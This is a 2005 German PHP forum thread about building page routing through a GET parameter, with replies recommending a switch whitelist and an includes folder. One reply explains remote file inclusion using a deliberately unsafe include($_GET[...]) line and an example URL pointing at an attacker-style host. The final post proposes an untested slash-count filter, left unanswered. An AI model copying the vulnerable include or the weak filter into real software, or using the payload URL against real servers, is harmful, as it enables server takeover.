index.php?=start - Lange gesucht, nichts gefunden - Experten gesucht :-)

Twisted Pair · 09.02.2005, 14:44

Guten Tag zusammen,

also ich bin das neue Mitglied hier und habe ein Problem. Ich weiß nicht mehr wie ich das gemacht hatte damals aber ich möchte die Funktion wieder haben. Leider finde ich den Codeschnipsel nicht mehr auf meinen CDs

Es geht ja darum dass man statt normal start.php einfach index.php?=start verwenden kann oder so ähnlich. Dazu muss ich doch in die Index Datei einen Code-Schnipsel stecken und dann in jede andere Datei mit dem gewünschten Namen wie: Start oder Seite2, Seite3.

Tja aber wie mache ich das nur? Ich habe jetzt schon den ganzen Tag wieder gesucht in den Foren und Databases, aber nicht wirklich das gefunden nach was ich suche.

Hier mein teilweise richtiger Code mal

In die Hauptdatei:

<?php
$path = 'includes/';
$extension = '.inc';
include($index);
}
?>

---------------

In jede andere Datei:

<?php
$start;
?>

---------------

Beim ersten oben mault er rum wegen dem Pfad bzw. den Ordner, und beim zweiten das geht ja somit noch nicht. Wobei das wahrscheinlich auch nicht richtig geschrieben wurde. Fehlt etwas oder was weiß ich. Ist schon lange her wo ich damit noch rumgesielt habe.

Bin für jede Hilfe dankbar !

Strogij · 09.02.2005, 14:55

Du meinst wahrscheinlich so eine Weiche:

PHP-Code:


			
switch ($_GET['seite'])

    { 

    case 'start':

    include('start.php');



    break; 



    case 'impressum': 

    include('impressum.php');

    

    break; 



    default: 

    include('404.php');



    break; 

    }

Aufruf mit xxx.php?seite=start, xxx.php?seite=impressum...

Twisted Pair · 09.02.2005, 15:02

Jain. Eine Weiche war das gar nichtmal. Ich hab nur was in der Index gehabt und dann in allen anderen Dateien.

In der Navigation hab ich dann alles eben so verlinkt: index.php?=start oder index.php?=tipps

Ich weiß nicht in wie fern eine Weiche gut sein soll. Sowas habe ich leider noch nie gebraucht

-----------
EDIT:

Habs aber verstanden

Aufruf mit: http://www.web-jumber.de/index.php?BEEPWARE-ID=start funktioniert auch.

Thank you very much

Strogij · 09.02.2005, 16:14

Mit deiner Version kann man auf jede Datei zugreifen (auch von anderen Servern), das stellt ein Risiko dar, weil es dann auch durch PHP geparst wird.

Twisted Pair · 09.02.2005, 16:22

Ahso, das wäre nich so toll. Auf jedenfall Danke Dir.

Sag mal, stimmt Deine ICQ-Nummer? Hab Dich mal vorsichtshalber hinzugefügt in meine Liste *g

Klappt soweit ganz gut mit dem Switch. Aber ist es jetzt noch möglich dass wenn man www.web-jumber.de eingibt auch auf start gezwungen wird. So dass man am Anfang nicht das index.php?= eingeben muss. Ich hab das irgendwo heute schonmal gelesen. Frägt sich nur wo *gg

Irgendwas mit start.php Zwang wenn es keine andere Seite gibt oder sowas.

-------
EDIT: mmh ja, bin ein schnell checker heut. habs schon

Default umschreiben als start statt 404.php

Sorry

walter · 09.02.2005, 17:15

Du kannst ja noch eine Codeschnipsel einfügen, das wenn keine Variable per GET übergeben wird, das dann immer auf die Startseite gesprungen wird.

Etwa so was:

PHP-Code:


			
if(!isset($_GET['seite']))

{

include('deineStartseite.php');

}

321 · 09.02.2005, 18:35

auch damit kann man jede beliebige Seite aufrufen!

Ich prüfe auch noch zusätzlich, dass keine / im Namen sind und habe alle include-Seiten in einem eigenen Ordner und nur aus diesem wird includet.

skipperjan · 09.02.2005, 18:46

Du kannst ja relativ einfach testen, ob die Datei bei dir existiert, und nicht irgendwas anderes repräsentiert, hatten wir vor ein paar Tagen auch schon mal wieder:

http://www.traum-projekt.com/forum/s...ad.php?t=59591

Aber so ist es sehr unsicher.

So long,

skipperjan

321 · 09.02.2005, 19:02

Dadurch dass ich nur aus dem einen Ordner include, kann nichts fremdes oder falsches mehr reingezogen werden.

Twisted Pair · 09.02.2005, 19:21

Ich habs jetzt auch so gemacht aus dem Ordner includes alles genommen.

<?php
switch ($_GET['BEEPWARE-ID'])
{

// Allgemein

default:
include('includes/start.php');

break;

case 'ueber_uns':
include('includes/ueber_uns.php');

break;

case 'downloads':
include('includes/downloads.php');

break;

case 'impressum':
include('includes/impressum.php');

break;

Funktioniert einwandfrei

walter · 09.02.2005, 20:08

Kann mir das jemand noch mal erklären warum das unsicher ist, und man damit eine beliebige Seite aufrufen kann?

PHP-Code:


			
if(!isset($_GET['seite']))

{

include('deineStartseite.php');

}

Dennis The Menace · 09.02.2005, 20:14

@walter999:

An den von dir gerade geposteten Code ist nichts unsicher. Unsicher wäre z.b.:

PHP-Code:


			
if( isset($_GET['seite']) ) 

  include($_GET['seite' . '.php');

Weil du so einen Angreifer die Möglichkeit gibst, fremde .php Dateien einzubinden.
http://deinserver.de/index.php?seite=http://boeserserver.de/boesesPhpSkript

Und schon würde dein Server meine boese PHP Datei inkludieren, und schon stehen dem Angreifer sämtliche Möglichkeiten, die PHP bietet, zur Verfügung. Dank shell_exec generell alles.

skipperjan · 09.02.2005, 20:20

Dito!

wenn deine Abfrage also nur statische Auswirkungen hat weil fest verdrahtet, dann ist das wurscht. Normalerweise werden solche Konstrukte gerne zur dynamischen Navigation genutzt, und dann wäre das von Dennis gepostete BSP fatal.

So long,

skip

walter · 09.02.2005, 22:48

Danke ihr zwei.

Ich zwifelte schon an mir.

Dachte schon das mein Beispiel ja kein Einbinden fremder Dateien gestattet. Die andere unsichere Lösung habe ich schon verstanden.

Schönen Abend!

Adromir · 09.02.2005, 23:50

Mal eine Frage:

PHP-Code:


			
if (substr_count($_GET[action], "/") == 0) include("$_GET[action].inc.php");

Wäre doch auch sicher? Sobald jemand irgendeine URL dort übergeben würde, wäre die Bedingung nicht mehr erfüllt und nichts includet, oder?